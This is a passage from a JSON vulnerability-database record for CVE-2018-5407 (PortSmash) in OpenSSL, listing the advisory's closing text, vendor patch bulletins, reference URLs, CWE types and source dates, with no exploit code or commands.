OpenSSL 1.1.1 and is already fixed in the latest\nversion of OpenSSL 1.1.0 (1.1.0i). OpenSSL 1.0.2 is affected but due to the low\nseverity of this issue we are not creating a new release at this time. The 1.0.2\nmitigation for this issue can be found in commit b18162a7c. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0i. \n\nThis issue was reported to OpenSSL on 26th October 2018 by Alejandro Cabrera\nAldaya, Billy Brumley, Sohaib ul Hassan, Cesar Pereida Garcia and Nicola Tuveri. \n\nNote\n====\n\nOpenSSL 1.1.0 is currently only receiving security updates. Support for this\nversion will end on 11th September 2019. Users of this version should upgrade to\nOpenSSL 1.1.1. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20181112.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2018-5407" }, { "db": "VULHUB", "id": "VHN-135438" }, { "db": "VULMON", "id": "CVE-2018-5407" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "152240" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "152071" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153887" }, { "db": "PACKETSTORM", "id": "152241" }, { "db": "PACKETSTORM", "id": "169678" } ], "trust": 1.98 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-135438", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=45785", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-135438" }, { "db": "VULMON", "id": "CVE-2018-5407" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-5407", "trust": 2.2 }, { "db": "TENABLE", "id": "TNS-2018-17", "trust": 1.2 }, { "db": "TENABLE", "id": "TNS-2018-16", "trust": 1.2 }, { "db": "BID", "id": "105897", "trust": 1.2 }, { "db": "EXPLOIT-DB", "id": "45785", "trust": 1.2 }, { "db": "PACKETSTORM", "id": "152241", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "152240", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "152071", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "155415", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "152084", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150138", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "155413", "trust": 0.1 }, { "db": "CNNVD", "id": "CNNVD-201811-279", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-135438", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-5407", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150437", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "155414", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "155417", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150561", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "153887", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169678", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-135438" }, { "db": "VULMON", "id": "CVE-2018-5407" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "152240" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "152071" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153887" }, { "db": "PACKETSTORM", "id": "152241" }, { "db": "PACKETSTORM", "id": "169678" }, { "db": "NVD", "id": "CVE-2018-5407" } ] }, "id": "VAR-201811-0912", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-135438" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:03:27.882000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Red Hat: Moderate: openssl security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20190483 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat Ansible Tower 3.4.3", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20190651 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.2 security release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193931 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.2 security release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193929 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat Ansible Tower 3.3.5", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20190652 - security advisory" }, { "title": "Ubuntu Security Notice: openssl, openssl1.0 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3840-1" }, { "title": "Red Hat: CVE-2018-5407", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2018-5407" }, { "title": "HP: HPSBHF03597 rev. 3 - PortSmash Side-Channel Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=hpsbhf03597" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2018-5407" }, { "title": "Arch Linux Advisories: [ASA-201812-7] lib32-openssl-1.0: private key recovery", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201812-7" }, { "title": "Red Hat: Moderate: ovmf security and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192125 - security advisory" }, { "title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBHF03597 rev. 3 - PortSmash Side-Channel Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=ffa91dec4581eb47b3539880d466865f" }, { "title": "Amazon Linux AMI: ALAS-2019-1188", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1188" }, { "title": "Arch Linux Advisories: [ASA-201812-8] openssl-1.0: private key recovery", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201812-8" }, { "title": "Debian Security Advisories: DSA-4355-1 openssl1.0 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=7cc6b04edacd67d6e5bf27bd36f54217" }, { "title": "Amazon Linux 2: ALAS2-2019-1188", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1188" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Security Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193935 - security advisory" }, { "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by a an openssl vulnerability (CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=002162619f80b70121c9a8d365823283" }, { "title": "IBM: IBM Security Bulletin: OpenSSL as used in IBM QRadar SIEM is vulnerable to a information disclosure (CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8aafdc7a03aa0793602eaa5ae3724cec" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Security Release on RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193932 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Security Release on RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193933 - security advisory" }, { "title": "Debian Security Advisories: DSA-4348-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=322bd50b7b929759e38c99b73122a852" }, { "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Integrated Analytics System", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=78c4a4229b60aec60d80d95cb29a4147" }, { "title": "IBM: IBM Security Bulletin: A vulnerability in OpenSSL affects PowerKVM", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e1dbc019531cd5742827de595730d1b0" }, { "title": "IBM: IBM Security Bulletin: IBM has released Unified Extensible Firmware Interface (UEFI) fixes in response to OpenSSL vulnerability CVE-2018-5407", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e2e9722c1fb1c14c9f54120082381491" }, { "title": "IBM: IBM Security Bulletin: A security vulnerability has been identified in OpenSSL, which is shipped with IBM Tivoli Network Manager IP Edition (CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=49fff94fe759cd40f1f516a339f15743" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities in OpenSSL Affect IBM Sterling B2B Integrator (CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e4ca493bfda92c5355c98328872a84e5" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational ClearQuest (CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c36f1dd66164e22918d817553be91620" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Sterling Connect:Express for UNIX (CVE-2018-0734 and CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=fda6d001f041b9b0a29d906059d798b4" }, { "title": "IBM: IBM Security Bulletin: IBM DataPower Gateway is affected by vulnerabilities in OpenSSL", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c7313d7a6ba5364a603c214269588feb" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational ClearCase (CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ddeebd7237369bd2318e4087834121a5" }, { "title": "IBM: IBM Security Bulletin: Security vulnerabilities identified in OpenSSL affect Rational Build Forge (CVE-2018-0734, CVE-2018-5407 and CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e59d7f075c856823d6f7370dea35e662" }, { "title": "Tenable Security Advisories: [R1] Nessus 8.1.1 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2018-16" }, { "title": "IBM: IBM Security Bulletin: IBM Event Streams is affected by OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=efdce9b94f89918f3f2b2dfc69780ccd" }, { "title": "IBM: IBM Security Bulletin: IBM InfoSphere Master Data Management Standard and Advanced Editions are affected by vulnerabilities in OpenSSL (CVE-2018-0735, CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c829d56f5888779e791387897875c4b4" }, { "title": "Tenable Security Advisories: [R1] Nessus 7.1.4 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2018-17" }, { "title": "IBM: IBM Security Bulletin: BigFix Platform 9.2.x affected by multiple vulnerabilities (CVE-2017-1231, CVE-2018-5407, CVE-2012-5883, CVE-2012-6708, CVE-2015-9251)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3101664cb57ad9d937108c187df59ecf" }, { "title": "IBM: IBM Security Bulletin: BigFix Platform 9.5.x affected by multiple vulnerabilities (CVE-2019-4013, CVE-2018-5407, CVE-2012-5883, CVE-2012-6708, CVE-2015-9251)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7dde8d528837d3c0eae28428fd6e703d" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities affect IBM\u00ae Cloud Private \u2013 Node.js", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2e571e7bc5566212c3e69e37ecfa5ad4" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Rational Application Developer for WebSphere Software", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2bd72b857f21f300d83d07a791be44cf" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Cloud App Management V2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=dce787e9d669a768893a91801bf5eea4" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities affect IBM\u00ae SDK for Node.js\u2122 in IBM Cloud", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=26f585287da19915b94b6cae2d1b864f" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities affect IBM\u00ae Cloud Private \u2013 fluentd", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=60de0933c28b353f38df30120aa2a908" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b" }, { "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Releases 1801-w and 1801-y", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bf3f2299a8658b7cd3984c40e7060666" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=aea3fcafd82c179d3a5dfa015e920864" }, { "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Release 1801-v", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=413b5f9466c1ebf3ab090a45e189b43e" }, { "title": "IBM: IBM Security Bulletin: IBM API Connect has addressed multiple vulnerabilities in Developer Portal\u2019s dependencies \u2013 Cumulative list from June 28, 2018 to December 13, 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=43da2cd72c1e378d8d94ecec029fcc61" }, { "title": "portsmash", "trust": 0.1, "url": "https://github.com/bbbrumley/portsmash " }, { "title": "vyger", "trust": 0.1, "url": "https://github.com/mrodden/vyger " }, { "title": "Firmware-Security", "trust": 0.1, "url": "https://github.com/virusbeee/firmware-security " }, { "title": "Hardware-and-Firmware-Security-Guidance", "trust": 0.1, "url": "https://github.com/nsacyber/hardware-and-firmware-security-guidance " }, { "title": "hardware-attacks-state-of-the-art", "trust": 0.1, "url": "https://github.com/codexlynx/hardware-attacks-state-of-the-art " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/portsmash-side-channel-attack-siphons-data-from-intel-other-cpus/138777/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-5407" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-203", "trust": 1.1 }, { "problemtype": "CWE-200", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-135438" }, { "db": "NVD", "id": "CVE-2018-5407" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.3, "url": "http://www.securityfocus.com/bid/105897" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/45785/" }, { "trust": 1.3, "url": "https://github.com/bbbrumley/portsmash" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:0483" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:0651" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:0652" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:2125" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:3929" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:3932" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2019:3935" }, { "trust": 1.3, "url": "https://usn.ubuntu.com/3840-1/" }, { "trust": 1.2, "url": "https://nodejs.org/en/blog/vulnerability/november-2018-security-releases/" }, { "trust": 1.2, "url": "https://security.netapp.com/advisory/ntap-20181126-0001/" }, { "trust": 1.2, "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "trust": 1.2, "url": "https://www.tenable.com/security/tns-2018-16" }, { "trust": 1.2, "url": "https://www.tenable.com/security/tns-2018-17" }, { "trust": 1.2, "url": "https://www.debian.org/security/2018/dsa-4348" }, { "trust": 1.2, "url": "https://www.debian.org/security/2018/dsa-4355" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201903-10" }, { "trust": 1.2, "url": "https://eprint.iacr.org/2018/1060.pdf" }, { "trust": 1.2, "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "trust": 1.2, "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "trust": 1.2, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.2, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.2, "url": "https://lists.debian.org/debian-lts-announce/2018/11/msg00024.html" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2019:3931" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2019:3933" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k49711130?utm_source=f5support\u0026amp%3butm_medium=rss" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5407" }, { "trust": 0.7, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.7, "url": "https://access.redhat.com/security/cve/cve-2018-5407" }, { "trust": 0.7, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.5, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0734" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0737" }, { "trust": 0.2, "url": "https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html" }, { "trust": 0.2, "url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9513" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9511" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9517" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0197" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17199" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17189" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9517" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0737" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-17199" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9516" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9513" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-0217" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0217" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-0197" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-17189" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9516" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-0196" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0196" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0734" }, { "trust": 0.1, "url": "https://support.f5.com/csp/article/k49711130?utm_source=f5support\u0026amp;amp;utm_medium=rss" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/203.html" }, { "trust": 0.1, "url": "https://threatpost.com/portsmash-side-channel-attack-siphons-data-from-intel-other-cpus/138777/" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=59118" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0734" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5407" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-3838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-3835" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0732" }, { "trust": 0.1, "url": "https://security-tracker.debian.org/tracker/openssl" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0735" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-10072" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-0221" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10072" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-1559" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/5.2/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0221" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1559" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5731" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3613" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5735" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5734" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-12181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-0161" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5731" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0160" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5732" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5733" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-3613" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0161" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20181112.txt" } ], "sources": [ { "db": "VULHUB", "id": "VHN-135438" }, { "db": "VULMON", "id": "CVE-2018-5407" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "152240" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "152071" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153887" }, { "db": "PACKETSTORM", "id": "152241" }, { "db": "PACKETSTORM", "id": "169678" }, { "db": "NVD", "id": "CVE-2018-5407" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-135438" }, { "db": "VULMON", "id": "CVE-2018-5407" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "152240" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "152071" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153887" }, { "db": "PACKETSTORM", "id": "152241" }, { "db": "PACKETSTORM", "id": "169678" }, { "db": "NVD", "id": "CVE-2018-5407" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-15T00:00:00", "db": "VULHUB", "id": "VHN-135438" }, { "date": "2018-11-15T00:00:00", "db": "VULMON", "id": "CVE-2018-5407" }, { "date": "2018-11-22T23:23:23", "db": "PACKETSTORM", "id": "150437" }, { "date": "2019-03-27T00:33:09", "db": "PACKETSTORM", "id": "152240" }, { "date": "2019-11-20T23:02:22", "db": "PACKETSTORM", "id": "155414" }, { "date": "2019-11-20T21:11:11", "db": "PACKETSTORM", "id": "155417" }, { "date": "2019-03-13T14:25:37", "db": "PACKETSTORM", "id": "152071" }, { "date": "2018-12-03T21:06:37", "db": "PACKETSTORM", "id": "150561" }, { "date": "2019-11-20T20:44:44", "db": "PACKETSTORM", "id": "155415" }, { "date": "2019-08-06T20:47:00", "db": "PACKETSTORM", "id": "153887" }, { "date": "2019-03-27T00:35:38", "db": "PACKETSTORM", "id": "152241" }, { "date": "2018-11-12T12:12:12", "db": "PACKETSTORM", "id": "169678" }, { "date": "2018-11-15T21:29:00.233000", "db": "NVD", "id": "CVE-2018-5407" } ] }, "sources_update_date": { "@context": { "@vocab": 